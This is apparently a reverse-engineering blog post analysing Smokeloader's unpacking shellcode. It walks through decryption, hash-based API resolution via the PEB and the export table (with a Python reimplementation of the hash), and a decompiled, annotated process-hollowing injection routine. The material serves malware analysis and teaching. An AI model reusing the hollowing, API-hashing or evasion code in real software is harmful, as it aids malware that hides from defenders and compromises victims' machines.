2/28/24 2:37 pm

Introduction

Hello Geeks, today I am going to dive deep into the shellcode that Smokeloader uses during its unpacking process. The shellcode is not too hard to understand, but it does have some challenges. I used some blogs for help with a few of the structures, so let's do it...

Overview

Smokeloader is one of the most widely used loaders these days because of how effective it is at techniques like

  • anti-sandboxing
  • anti-debugging
  • AV Evasion
  • Process Injection
  • Anti Hooking

I will not analyze the whole sample in this blog. I will only analyze the code used in the unpacking process, because I think almost all malware nowadays is packed and we need to understand how unpacking is done at the assembly level.

FirstLook -_-

I have used an old sample because you can find it easily with the SHA-1 hash “72FC3CE96BD9406215CEC015D70BBB67318F1E23”

The sample is flagged by 60 AV engines on VirusTotal, and it imports some functions that are rarely used in malicious operations, which is an indicator of packing. To confirm, I will test it against PEiD and look at the entropy of the sections.

big difference in raw and virtual size — figure 01

And here is how the entropy looks in PEiD, which is also a strong indicator of packing:

CODE Analysis

I will use IDA to disassemble the code. After moving around the code tab and between functions, I found that the sample uses a lot of junk code just to make analysis harder. When dealing with packed samples, there are some APIs that deserve our attention:

  • VirtualAlloc
  • GlobalAlloc
  • LocalAlloc
  • VirtualAllocEx

In sub_4019B0() there are two calls to the LocalAlloc() API. One of them does nothing, and the other is called with the argument dwSize.

first call to LocalAlloc - figure 02

The function Missed_() at 0x0401E9F makes some changes to the global variable dwSize.

We need to trace the allocated space to see what data gets written there. In the next figure, data is copied into it through pointers.

Write data into the allocated Address — figure 03

This block of code copies the content from (dword_45CF0C + k + 0x8F176), where 'k' is used as a counter. To know where the data is copied from, we need the value of dword_45CF0C.

Before the loop there is another assignment worth paying attention to:

dword_45CF0C = dword_448A84

When I checked dword_448A84, I found that its initial value is 0x39AAA2.

Solving the expression above with k = 0 gives:

0x39AAA2 + 0x8F176 = 0x00429C18 → ShellCode Address

figure 04
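The address arithmetic above is easy to double-check in Python. This is only a sanity check of the two constants quoted from the sample; the variable names are mine and do not come from the binary.

```python
# Values quoted in the text above; the variable names are illustrative only.
initial_value = 0x39AAA2   # initial value of dword_448A84
loop_offset = 0x8F176      # constant added inside the copy loop

shellcode_data_va = initial_value + loop_offset
print(hex(shellcode_data_va))  # 0x429c18
```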

Jumping to the resolved address 0x0429C18, this is what I found:

figure 05

In sub_403206(int &lpaddress , SIZE_T &dwsize) there is another call to the LocalAlloc API.

figure 06

If we look at the end of this function, lpaddress is changed so that it points to the shellcode address. What I took from this function is that it writes the code section of the shellcode, because what we saw above in figure 05 is not the real shellcode. It is just the data that the shellcode will use for payload injection.

Change Protection and Transfer Execution

figure 07

Here the packer changes the protection of the allocated memory where the shellcode has been written, using 0x40 as the new protection:

0x40 → PAGE_EXECUTE_READWRITE

After that there is a call to lpAddress → the start of the shellcode, so I will use the debugger for the next steps to extract the shellcode and reverse it.

Apply decryption for ShellCode

I know this may be confusing, but it may help you in your next unpacking session and change the way you think about unpacking and how to deal with it.

At address 0x401BAD we see a call to 0x404B83. I have renamed the function to mw_w_apply_decryption to express its behavior. The function takes 3 arguments:

push    offset unk_448000  
push    dwSize  
push    lpAddress  
call    mw_w_apply_decryption  

unk_448000 contains some data that we need to keep an eye on.

Inside mw_w_apply_decryption there is a call to 0x404934, which I have renamed apply_decryption:

 for ( i = 0; i < dwsize / 8; ++i )  
  {  
    if ( dwSize == 4445 )  
      VerifyVersionInfoW(&VersionInformation, 0, 0i64);  
    result = apply_decryption(lpaddress + 8 * i, unk__);  
  }

So we need to dive into this function and find the decryption part. I see some XOR operations and some bit shifting, but I am not really interested in the decryption mechanism itself. I just want to know what this function does to the shellcode.

figure 08
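The loop in mw_w_apply_decryption can be modelled in a few lines of Python. This is only a sketch of how the buffer is walked, not of the cipher: `dummy_decrypt_block` is a hypothetical stand-in for apply_decryption (a plain XOR so that the code runs), and passing the key as bytes is my assumption. What it illustrates is that the buffer is processed in 8-byte blocks and that, because of the integer division dwSize / 8, any trailing bytes are left untouched.

```python
from typing import Callable

BLOCK_SIZE = 8  # the decompiled loop advances by 8 bytes per iteration


def dummy_decrypt_block(block: bytes, key: bytes) -> bytes:
    """Placeholder for apply_decryption; NOT the sample's real algorithm."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(block))


def decrypt_buffer(
    data: bytes,
    key: bytes,
    decrypt_block: Callable[[bytes, bytes], bytes] = dummy_decrypt_block,
) -> bytes:
    out = bytearray(data)
    # Same bound as the decompiled code: i < dwSize / 8 (integer division).
    for i in range(len(data) // BLOCK_SIZE):
        start = i * BLOCK_SIZE
        block = bytes(out[start:start + BLOCK_SIZE])
        out[start:start + BLOCK_SIZE] = decrypt_block(block, key)
    return bytes(out)
```

Once the real block routine has been reversed, it could be dropped in through the `decrypt_block` parameter without touching the loop.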

Advanced Dynamic Analysis

Here is the first call to the LocalAlloc() API:

figure 09

We'll keep our eyes on the allocated space:

figure 10

Here the shellcode has been written into the allocated space, and as I said before, at the end of this function lpaddress is changed:

mov dword ptr ds:[eax],edi

eax --> lpaddress  
edi --> the address of the shellcode 

figure 11

Here is the decryption part I explained above, followed by the execution transfer:

figure 12

And here is the start of the shellcode:

figure 13

I will dump this shellcode and analyze it with some tricks and a few structures, using IDA for the next part of the analysis.

After cleaning the dumped memory and mapping the addresses, here is the start of the shellcode.

the start of Shellcode- figure 14

Inside sub_630, the shellcode uses stack strings to evade detection by security solutions. Before these strings are resolved, there is a call to sub_010 at address 0x647, which I have renamed sh_w_GetAPIAddr. Let's explore it to see why I chose this name.

sh_w_GetAPI_Addr — figure 15

Inside sub_0110 there is another call, to sub_042, which I have renamed sh_GetAPIAddr. It takes 2 arguments:

call for API hashing resolve figure-16

ptr_loadlibrary = sh_GetAPIAddr(0xD4E88, 0xD5786);// find kernel32, then get the LoadLibrary address
ptr_GetProcAddr = sh_GetAPIAddr(0xD4E88, 0x348BFA);// find kernel32, then get the GetProcAddress address

The idea is that the caller passes a hash of the DLL name and a hash of the API name, and inside this function there is some work with the PEB structures and the loaded modules. Most malware resolves its APIs at run time like this to evade detection and to make analysis harder. So I will dive into this call to see how it is done, and after that I will show you something that makes getting past this trick very easy. Let's dive deep into sub_042 and see how these hashes are resolved to API addresses.

I will paste the code of this function here instead of using figures to make it easier to trace, and I have commented every assembly line for those who are comfortable with assembly -_-

seg000:00000042 sh_GetAPIAddr   proc near               

seg000:00000042
seg000:00000042 hash_Kerenl32 = dword ptr 8
seg000:00000042 hash_loadlibrary= dword ptr 0Ch
seg000:00000042
seg000:00000042 push ebp
seg000:00000043 mov ebp, esp
seg000:00000045 push ebx
seg000:00000046 push esi
seg000:00000047 push edi
seg000:00000048 push ecx
seg000:00000049 push dword ptr fs:loc_30 ; push fs:[0x30] --> PEB
seg000:00000050 pop eax ; eax --> PEB
seg000:00000051 mov eax, [eax+0Ch] ; eax --> PEB.Ldr (loader data)
seg000:00000054 mov ecx, [eax+0Ch] ; ecx --> first entry of InLoadOrderModuleList
seg000:00000057
seg000:00000057 loc_57:
seg000:00000057 mov edx, [ecx] ; edx --> Flink, the next module in the list
seg000:00000059 mov eax, [ecx+30h] ; eax --> BaseDllName buffer
seg000:0000005C push 2 ; a3
seg000:0000005E mov edi, [ebp+hash_Kerenl32]
seg000:00000061 push edi ; edi --> pre-calculated hash of the DLL name
seg000:00000062 push eax ; name of the loaded DLL
seg000:00000063 call hash_and_compare
seg000:00000068 test eax, eax
seg000:0000006A jz short loc_70 ; eax = 0 --> comparison succeeded
seg000:0000006C mov ecx, edx ; move on to the next module
seg000:0000006E jmp short loc_57
seg000:00000070 ; ---------------------------------------------------------------------------
seg000:00000070
seg000:00000070 loc_70:
seg000:00000070 mov eax, [ecx+18h] ; ecx --> current module entry
seg000:00000070 ; eax = [ecx+0x18] --> DllBaseAddress
seg000:00000073 push eax ; push BaseAddress of Dll
seg000:00000074 mov ebx, [eax+3Ch] ; ebx --> e_lfanew (offset of the NT headers)
seg000:00000077 add eax, ebx ; eax = DllBaseAddress + e_lfanew
seg000:00000079 mov ebx, [eax+78h] ; ebx --> RVA of the export directory (DataDirectory[0])
seg000:0000007C pop eax ; pop eax --> eax = DllBaseAddress
seg000:0000007D push eax ; push DllBaseAddress
seg000:0000007E add ebx, eax ; ebx = export directory RVA + DllBaseAddress
seg000:00000080 mov ecx, [ebx+1Ch] ; ecx = [ebx+1Ch] --> AddressOfFunctions
seg000:00000083 mov edx, [ebx+20h] ; edx = [ebx+20h] --> AddressOfNames
seg000:00000086 mov ebx, [ebx+24h] ; ebx = [ebx+24h] --> AddressOfNameOrdinals
seg000:00000089 add ecx, eax ; ecx = AddressOfFunctions + DllBaseAddress
seg000:0000008B add edx, eax ; edx = AddressOfNames + DllBaseAddress
seg000:0000008D add ebx, eax ; ebx = AddressOfNameOrdinals + DllBaseAddress
seg000:0000008F
seg000:0000008F loc_8F:
seg000:0000008F mov esi, [edx] ; esi = RVA of the current export name
seg000:00000091 pop eax
seg000:00000092 push eax ; eax --> DllBaseAddress
seg000:00000093 add esi, eax ; esi = esi + eax --> API name
seg000:00000095 push 1 ; a3
seg000:00000097 push [ebp+hash_loadlibrary] ; pre-calculated hash of the API name
seg000:0000009A push esi ; API name
seg000:0000009B call hash_and_compare
seg000:000000A0 test eax, eax
seg000:000000A2 jz short loc_AC ; eax = 0 --> API name matched
seg000:000000A4 add edx, 4 ; next entry in AddressOfNames
seg000:000000A7 add ebx, 2 ; next entry in AddressOfNameOrdinals
seg000:000000AA jmp short loc_8F
seg000:000000AC ; ---------------------------------------------------------------------------
seg000:000000AC
seg000:000000AC loc_AC:
seg000:000000AC pop eax ; eax --> DllBaseAddress
seg000:000000AD xor edx, edx ; edx = 0
seg000:000000AF mov dx, [ebx] ; dx = [ebx] --> ordinal index of the resolved API
seg000:000000B2 shl edx, 2 ; edx * 4
seg000:000000B5 add ecx, edx ; ecx = AddressOfFunctions + (edx*4)
seg000:000000B7 add eax, [ecx] ; eax = DllBaseAddress + [ecx] (RVA of the function)
seg000:000000B7 ; eax --> API_Address
seg000:000000B9 pop ecx
seg000:000000BA pop edi
seg000:000000BB pop esi
seg000:000000BC pop ebx
seg000:000000BD mov esp, ebp
seg000:000000BF pop ebp
seg000:000000C0 retn 8

seg000:000000C0 sh_GetAPIAddr endp
seg000:000000C0

Keep your eyes on this code for a few seconds. I tried to make the comments easy to understand, and I will also explain it step by step.

At address 0x49 the shellcode fetches the PEB (Process Environment Block) through fs:[0x30], which IDA displays as fs:loc_30. The PEB holds data about the current process, such as the loaded modules, and this data is also used by the Windows loader.

seg000:00000049     push    dword ptr fs:loc_30 ; push PEB
seg000:00000051     mov     eax, [eax+0Ch]  ; eax --> LoaderData  

Here it gets the address of the loader data by reading offset 0xC of the PEB, whose address is in eax.

Here is what the loader data structure looks like:

struct _PEB_LDR_DATA {                               //loader data Structure  
    DWORD                 Length_;                         //+00  
    DWORD                 Initialized;                     //+04  
    DWORD                 SsHandle;                        //+08  
    __LIST_ENTRY          InLoadOrderModuleList;           //+0C  
    __LIST_ENTRY          InMemoryOrderModuleList;         //+14  
    __LIST_ENTRY          InInitializationOrderModuleList; //+1C  
    DWORD                 EntryInProgress;                 //+24    
    DWORD                 ShutdownInProgress;              //+28  
    DWORD                 ShutdownThreadId;                //+2C  
};

seg000:00000054 mov ecx, [eax+0Ch] ; ecx –> InloadOrderModuleList

Reading offset 0xC of the loader data, whose address is in eax, gives us InLoadOrderModuleList, a linked list of the loaded modules in which every node is a structure.
Here is what this structure looks like:

struct _LDR_DATA_TABLE_ENTRY{  
  __LIST_ENTRY              InLoadOrderLinks;              //+00  
  __LIST_ENTRY              InMemoryOrderLinks;            //+08  
  __LIST_ENTRY              InInitializationOrderLinks;    //+10  
  DWORD                     DllBase;                        //+18  
  DWORD                     EntryPoint;                     //+1C  
  DWORD                     SizeOfImage;                    //+20  
  DWORD                     FullDllNameLength;              //+24  
  wchar_t*                  FullDllName; // _UNICODE_STRING //+28  
  DWORD                     BaseDllNameLength;              //+2C  
  wchar_t*                  BaseDllName; //_UNICODE_STRING  //+30  
  DWORD                     Flags;                          //+34  
  short                     LoadCount;                      //+38  
  short                     TlsIndex;                       //+3A  
  union{  
  __LIST_ENTRY              HashLinks;  
  DWORD                     SectionPointer;  
  };  
  DWORD                     CheckSum;  
  union{  
    DWORD                   TimeDateStamp;  
    DWORD                   LoadedImports;  
  };  
  DWORD                     EntryPointActivationContext;  
  DWORD                     PatchInformation;  
  __LIST_ENTRY              ForwarderLinks;  
  __LIST_ENTRY              ServiceTagLinks;  
  __LIST_ENTRY              StaticLinks;  
};  
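The two offsets that the shellcode relies on (0x18 for DllBase and 0x30 for the name buffer) can be checked by describing the start of the entry with ctypes. This is a minimal sketch that assumes the 32-bit layout shown above, with pointers modelled as 32-bit integers; the `...32` class names are mine, and only the fields up to BaseDllName are declared.

```python
import ctypes


class LIST_ENTRY32(ctypes.Structure):
    _fields_ = [("Flink", ctypes.c_uint32), ("Blink", ctypes.c_uint32)]


class UNICODE_STRING32(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_uint16),
                ("MaximumLength", ctypes.c_uint16),
                ("Buffer", ctypes.c_uint32)]  # 32-bit pointer to UTF-16 text


class LDR_DATA_TABLE_ENTRY32(ctypes.Structure):
    _fields_ = [("InLoadOrderLinks", LIST_ENTRY32),
                ("InMemoryOrderLinks", LIST_ENTRY32),
                ("InInitializationOrderLinks", LIST_ENTRY32),
                ("DllBase", ctypes.c_uint32),
                ("EntryPoint", ctypes.c_uint32),
                ("SizeOfImage", ctypes.c_uint32),
                ("FullDllName", UNICODE_STRING32),
                ("BaseDllName", UNICODE_STRING32)]


dll_base_off = LDR_DATA_TABLE_ENTRY32.DllBase.offset
name_buffer_off = (LDR_DATA_TABLE_ENTRY32.BaseDllName.offset
                   + UNICODE_STRING32.Buffer.offset)
print(hex(dll_base_off), hex(name_buffer_off))  # 0x18 0x30
```

The second value shows why the shellcode reads [ecx+30h]: BaseDllName starts at 0x2C, and its Buffer pointer sits 4 bytes into the UNICODE_STRING.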

The next assembly line reads the link of the current entry, which points to the next module in the list:

seg000:00000057 mov edx, [ecx] ; edx –> address of the frist loaded Module

After that it gets the name of the loaded DLL by reading offset 0x30 of the module entry:

seg000:00000059 mov eax, [ecx+30h] ; eax –> BaseDllName

After getting the DLL name and saving a pointer to it in the eax register

eax → points to the DLL name

the shellcode calls sub_0C3, which I have renamed hash_and_compare.

hash_and_compare call - figure 17

This function takes 3 arguments:

1- the value 2

2- the pre-calculated hash to compare with (see figure 16)

3- the DLL name resolved before

So I will analyze this function to see how the hash algorithm works.

Inside sub_c3:

This line moves the pointer to the passed DLL name into eax:
seg000:000000CF mov eax, [ebp+arg_Dll_Name] ; eax --> DLL Name

Then it loops over the full DLL name:

hashing loop — figure 18

The algorithm here is very simple, and we can summarize it in a few steps:

1- convert the character to lowercase, A → a

2- add this character to the previous hash

3- shift the result of step 2 left by 1, i.e. multiply it by 2 (shl ebx,1)

4- check whether we reached the end of the name by checking for the null terminator

After calculating the hash of the DLL name, it compares it against the pre-calculated hash. If the comparison fails, the function returns 1, and if it succeeds, it returns 0.

figure 19
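The steps above translate into a very small Python function. This is a sketch based on my reading of the description, not code taken from the sample: the function name is mine, the 32-bit mask models the register width, and the case folding is assumed to be `ch | 0x60` rather than a real tolower(). I chose that assumption because it reproduces all three constants passed to sh_GetAPIAddr, while a plain tolower() does not give 0xD4E88 for kernel32.dll (the digits and the dot would stay unchanged).

```python
def add_shl1_hash(name: str) -> int:
    """Fold the case, add the character to the hash, then shift left by 1."""
    h = 0
    for ch in name.encode("ascii"):
        # Assumption: "lowercase" is implemented as an OR with 0x60.
        h = ((h + (ch | 0x60)) << 1) & 0xFFFFFFFF  # stay inside a 32-bit register
    return h


print(hex(add_shl1_hash("kernel32.dll")))    # 0xd4e88
print(hex(add_shl1_hash("LoadLibraryA")))    # 0xd5786
print(hex(add_shl1_hash("GetProcAddress")))  # 0x348bfa

# A reverse lookup table over candidate names is enough to label hashes by hand.
candidates = ["LoadLibraryA", "GetProcAddress", "VirtualAlloc"]
lookup = {add_shl1_hash(n): n for n in candidates}
print(lookup[0x348BFA])  # GetProcAddress
```

Because of the OR, the hash is case-insensitive for letters, so "KERNEL32.DLL" and "kernel32.dll" produce the same value.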

If the comparison succeeds, it then resolves the API address with a similar method, using the export table of the resolved DLL. Here is the code of this part:

 
seg000:00000070 loc_70:                         ; ecx --> current module entry
seg000:00000070         mov     eax, [ecx+18h]  ; ecx --> current module entry
seg000:00000070                                 ; eax = [ecx+0x18] --> DllBaseAddress
seg000:00000073         push    eax             ; push BaseAddress of Dll
seg000:00000074         mov     ebx, [eax+3Ch]  ; ebx --> e_lfanew (offset of the NT headers)
seg000:00000077         add     eax, ebx        ; eax = DllBaseAddress + e_lfanew
seg000:00000079         mov     ebx, [eax+78h]  ; ebx --> RVA of the export directory (DataDirectory[0])
seg000:0000007C         pop     eax             ; pop eax --> eax = DllBaseAddress
seg000:0000007D         push    eax             ; push DllBaseAddress
seg000:0000007E         add     ebx, eax        ; ebx = export directory RVA + DllBaseAddress
seg000:00000080         mov     ecx, [ebx+1Ch]  ; ecx = [ebx+1Ch] --> AddressOfFunctions
seg000:00000083         mov     edx, [ebx+20h]  ; edx = [ebx+20h] --> AddressOfNames
seg000:00000086         mov     ebx, [ebx+24h]  ; ebx = [ebx+24h] --> AddressOfNameOrdinals
seg000:00000089         add     ecx, eax        ; ecx = AddressOfFunctions + DllBaseAddress
seg000:0000008B         add     edx, eax        ; edx = AddressOfNames + DllBaseAddress
seg000:0000008D         add     ebx, eax        ; ebx = AddressOfNameOrdinals + DllBaseAddress
seg000:0000008F  

Do you remember the module linked list I talked about?
At 0x0070, [ecx+18h] reads the DllBaseAddress member of the current entry,
which is the address where this DLL is loaded in memory.

After that, at 0x0074, it reads the dword at offset 0x3C of the base address.
This is e_lfanew, the offset of the NT headers (the PE signature), and adding it
to the base address gives the address of the NT headers.

At 0x0079 it reads the dword at offset 0x78 of the NT headers, which is the RVA
of the export directory, the first entry of the data directory. Once the base
address is added, ebx points to the export table, a structure that holds
information about each exported API, like

-name
-address
-ordinal number

From 0x0080 to 0x0086 it resolves the addresses of the arrays where this data is stored:

ecx --> address of function  
edx --> address of Names  
ebx --> address of NameOrdinal  

and here is the structure :

typedef struct _IMAGE_EXPORT_DIRECTORY {  
    DWORD   Characteristics;        // 0x0    
    DWORD   TimeDateStamp;          // 0x4    
    WORD    MajorVersion;           // 0x8    
    WORD    MinorVersion;           // 0xA    
    DWORD   Name;                   // 0xC    
    DWORD   Base;                   // 0x10   
    DWORD   NumberOfFunctions;      // 0x14   
    DWORD   NumberOfNames;          // 0x18   
    DWORD   AddressOfFunctions;     // 0x1C   
    DWORD   AddressOfNames;         // 0x20   
    DWORD   AddressOfNameOrdinals;  // 0x24   
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;

If the code and structures above are confusing, this graph from the Corkami project may help you.

retrieve API Name

After working through these structures, the shellcode gets each API name and hashes it with the same operation used before for the DLL name.

hash API name — figure 20

Here it pushes 3 arguments:

  • API name
  • a3 → 1 this time instead of 2, most likely the character size: export names are ASCII strings, while the DLL name in the PEB is a Unicode (UTF-16) string
  • pre-calculated hash of the API to compare with

If the comparison succeeds, the shellcode resolves the address of the API using the same export table structure.

figure 20

At the end of this function the resolved API address is saved in the eax register.
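The whole export walk fits in a short Python model. This is a sketch under stated assumptions, not a port of the shellcode: `image` stands for a module as it is mapped in memory (so an RVA is simply an index into the buffer), the helper names are mine, and the hash uses the same assumed `| 0x60` case folding as before. Unlike the shellcode, which loops until it finds a match, the sketch stops after NumberOfNames entries and returns None.

```python
import struct
from typing import Optional


def name_hash(name: bytes) -> int:
    # Add-then-shift hash described earlier; "| 0x60" is an assumed case fold.
    h = 0
    for ch in name:
        h = ((h + (ch | 0x60)) << 1) & 0xFFFFFFFF
    return h


def u32(image: bytes, rva: int) -> int:
    return struct.unpack_from("<I", image, rva)[0]


def u16(image: bytes, rva: int) -> int:
    return struct.unpack_from("<H", image, rva)[0]


def c_string(image: bytes, rva: int) -> bytes:
    return image[rva:image.index(b"\x00", rva)]


def resolve_by_hash(image: bytes, base: int, api_hash: int) -> Optional[int]:
    nt_headers = u32(image, 0x3C)                # e_lfanew
    export_dir = u32(image, nt_headers + 0x78)   # DataDirectory[0].VirtualAddress
    number_of_names = u32(image, export_dir + 0x18)
    functions = u32(image, export_dir + 0x1C)    # AddressOfFunctions
    names = u32(image, export_dir + 0x20)        # AddressOfNames
    ordinals = u32(image, export_dir + 0x24)     # AddressOfNameOrdinals
    for i in range(number_of_names):
        name = c_string(image, u32(image, names + 4 * i))
        if name_hash(name) == api_hash:
            index = u16(image, ordinals + 2 * i)             # mov dx, [ebx]
            return base + u32(image, functions + 4 * index)  # add eax, [ecx]
    return None
```

The important detail is the two-step lookup: the position in AddressOfNames selects an entry in AddressOfNameOrdinals, and that value, not the position itself, indexes AddressOfFunctions.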

I know you may have missed some things because of my explanation, but I am not that guy who is great at teaching people hard things.

So I will show you how to deal with API hashing and let IDA do this job for you.

First, you need to install the HashDB plugin from OALabs.

After installing the plugin, go to the hash that is passed to the function and right-click on it.

You will find an entry like HashDB Hunt Algorithm.

figure 21

After clicking on it, wait about 15 seconds and your output will look like this:

hashdb output — figure 22

Choosing a different algorithm may give you a different result, so compare the result with the call arguments to confirm you picked the right one.

After that you will find a local type created in your Local Types tab with the name of the algorithm you chose.

local types — figure 23

Then go back to your code, put the cursor on the function, and change its argument type by pressing the hotkey ‘y’. You will see this on your screen:

function argument type -figure 23

You need to change the argument type from:

int → *algorithm name

In my case it looks like this:

figure 24

After that IDA will replace these hashes with their equivalent API names, like this:

Dynamic Api Resolving — figure 25

Building IAT (import address table)

After that, sub_630 resolves the API addresses it needs and builds its own API table. After some reversing I created a structure for the resolved API names so that I can tell which API is called inside the other functions.

building IAT — figure 26

and here is how this structure looks like

struct API_IAT  
{  
  int ptr_LoadLibrary;  
  int ptr_GetProcAddr;  
  char var_D8;  
  int buffer;  
  int user32_hModule;  
  int MessageBoxA_api;  
  int GetMessageExtraInfo_api;  
  int kernel32_hModule;  
  int WinExec_api;  
  int CreateFileA_api;  
  int WriteFile_api;  
  int CloseHandle_api;  
  int CreateProcessA_api;  
  int GetThreadContext_api;  
  int VirtualAlloc_api;  
  int VirtualAllocExw_api;  
  int VirtualFree_api;  
  int ReadProcessMemory_api;  
  int WriteProcessMemory_api;  
  int SetThreadContext_api;  
  int ResumeThread_api;  
  int WaitForSingleObject_api;  
  int GetModuleFileNameA_api;  
  int GetCommandLineA_api;  
  int RegisterClassExA_api;  
  int CreateWindowExA_api;  
  int PostMessageA_api;  
  int GetMessageA_api;  
  int DefWindowProcA_api;  
  int GetFileAttributesA_api;  
  int ntdlldll_hModule;  
  int NtUnmapViewOfSection_api;  
  int NtWriteVirtualMemory_api;  
  int GetStartupInfoA_api;  
  int VirtualProtectEx_api;  
  int ExitProcess_api;  
};

At the end of sub_630 the member [API_IAT.buffer] is assigned the value 0x15A0, and there is a call to sub_5B0 with our structure as the argument.

figure 27

When I jumped to address 0x15A0 I found the payload that this shellcode drops, which is a PE file.

PE file - figure 28

Inside sub_110 an injection is carried out, specifically process hollowing. I will not explain how process hollowing works because I did that before in another article that explains it line by line; you can check it here.

Here is the code used for this operation:

 v19 = 2;  
  buffer = IAT_Struct->buffer;                  // buffer = 0x15A0, the embedded PE payload  
  ptr_optionalHeader = *(buffer + 0x3C) + IAT_Struct->buffer;// e_lfanew --> start of the NT headers (PE signature)  
  ptr_memory = (IAT_Struct->VirtualAlloc_api)(0, 10240, 4096, 4);// MEM_COMMIT, PAGE_READWRITE  
  result = (IAT_Struct->GetModuleFileNameA_api)(0, ptr_memory, 10240);// path of the current executable  
  if ( *ptr_optionalHeader == 'EP' )            // "PE\0\0" signature  
  {  
    v15 = 0;  
    v16 = 0;  
    hProcess = 0;  
    v14 = 0;  
    memset(v3, 0, sizeof(v3));  
    v5 = 0;  
    v9 = 0;  
    v7 = 0;  
    v8 = 0;  
    v6 = 0;  
    v4 = 0;  
    (IAT_Struct->GetStartupInfoA_api)(v3);  
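    // The trailing arguments belong to CreateProcessA; the decompiler attached them to the wrong call.  
    // 0x8000004 = CREATE_NO_WINDOW | CREATE_SUSPENDED  
    commandLine_ = (IAT_Struct->GetCommandLineA_api)(0, 0, 0, 0x8000004, 0, 0, v3, &hProcess);  
    result = (IAT_Struct->CreateProcessA_api)(ptr_memory, commandLine_);  
    if ( result )                               // nonzero on success  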
    {  
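      (IAT_Struct->VirtualFree_api)(ptr_memory, 0, 0x8000);// MEM_RELEASE  
      ptr_memory_1 = (IAT_Struct->VirtualAlloc_api)(0, 4, 4096, 4);// buffer for the thread CONTEXT  
      *ptr_memory_1 = 65543;                    // ContextFlags = 0x10007 (CONTEXT_FULL)  
      result = (IAT_Struct->GetThreadContext_api)(v14, ptr_memory_1);// v14 = thread handle  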
      if ( result )  
      {  
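        // ptr_memory_1[41] = CONTEXT.Ebx (PEB of the new process); PEB + 8 = ImageBaseAddress  
        (IAT_Struct->ReadProcessMemory_api)(hProcess, ptr_memory_1[41] + 8, &base_address, 4, 0);  
        if ( base_address == *(ptr_optionalHeader + 0x34) )// +0x34 = ImageBase of the payload  
          (IAT_Struct->NtUnmapViewOfSection_api)(hProcess, base_address);  
        v11 = (IAT_Struct->VirtualAllocExw_api)(  
                hProcess,  
                *(ptr_optionalHeader + 52),     // ImageBase  
                *(ptr_optionalHeader + 80),     // SizeOfImage  
                12288,                          // MEM_COMMIT | MEM_RESERVE  
                64);                            // PAGE_EXECUTE_READWRITE  
        // copy the PE headers (+84 = SizeOfHeaders)  
        (IAT_Struct->NtWriteVirtualMemory_api)(hProcess, v11, IAT_Struct->buffer, *(ptr_optionalHeader + 84), 0);  
        for ( i = 0; i < *(ptr_optionalHeader + 6); ++i )// +6 = NumberOfSections  
        {  
          // 248 = size of the 32-bit NT headers, 40 = size of one section header  
          v17 = (*(buffer + 60) + IAT_Struct->buffer + 40 * i + 248);  
          // v17[3] = VirtualAddress, v17[5] = PointerToRawData, v17[4] = SizeOfRawData  
          (IAT_Struct->NtWriteVirtualMemory_api)(hProcess, v17[3] + v11, v17[5] + IAT_Struct->buffer, v17[4], 0);  
        }  
        // patch PEB.ImageBaseAddress with the ImageBase of the payload  
        (IAT_Struct->WriteProcessMemory_api)(hProcess, ptr_memory_1[41] + 8, ptr_optionalHeader + 52, 4, 0);  
        ptr_memory_1[44] = *(ptr_optionalHeader + 40) + v11;// CONTEXT.Eax = AddressOfEntryPoint + new base  
        (IAT_Struct->SetThreadContext_api)(v14, ptr_memory_1);  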
        (IAT_Struct->ResumeThread_api)(v14);  
        (IAT_Struct->CloseHandle_api)(v14);  
        (IAT_Struct->CloseHandle_api)(hProcess);  
        return (IAT_Struct->ExitProcess_api)(0);  
      }  
    }  
  }  
  return result;  
}

To summarize, this shellcode does the following:

  • build an IAT using run-time API resolving
  • start a new instance of its own executable in a suspended state
  • unmap the original image from the memory of the new process
  • map and inject the new payload which resides at 0x15A0
  • resume the process with the new payload
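To make the magic offsets in the decompiled code easier to follow, here is a small Python sketch that reads the same header fields from a dumped payload. It is not part of the sample: the function name and the returned keys are mine, and it assumes a 32-bit PE, which is what the hard-coded 248 (size of the 32-bit NT headers) in the decompiled loop implies.

```python
import struct


def hollowing_fields(payload: bytes) -> dict:
    """Read the header fields that the decompiled injection code dereferences."""
    nt = struct.unpack_from("<I", payload, 0x3C)[0]   # e_lfanew
    if payload[nt:nt + 4] != b"PE\x00\x00":           # the 'EP' comparison
        raise ValueError("not a PE image")

    def dword(offset: int) -> int:
        return struct.unpack_from("<I", payload, nt + offset)[0]

    number_of_sections = struct.unpack_from("<H", payload, nt + 6)[0]
    sections = []
    for i in range(number_of_sections):
        header = nt + 248 + 40 * i                    # 32-bit section table
        # Offsets 12, 16, 20: VirtualAddress, SizeOfRawData, PointerToRawData
        sections.append(struct.unpack_from("<III", payload, header + 12))

    return {
        "entry_point_rva": dword(40),   # AddressOfEntryPoint
        "image_base": dword(52),        # ImageBase (0x34)
        "size_of_image": dword(80),     # SizeOfImage
        "size_of_headers": dword(84),   # SizeOfHeaders
        "sections": sections,
    }
```

Running it on the bytes dumped from offset 0x15A0 of the shellcode should show where each section would be written in the hollowed process, which is handy when rebuilding the payload by hand.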

This is the end of the article. I hope you learned something new, and if there are any mistakes, do not hesitate to tell me.

thanks for your time -_- ……….

Article Link: https://farghlymal.github.io/2023-05-18-SmokeLoader-Shellcode/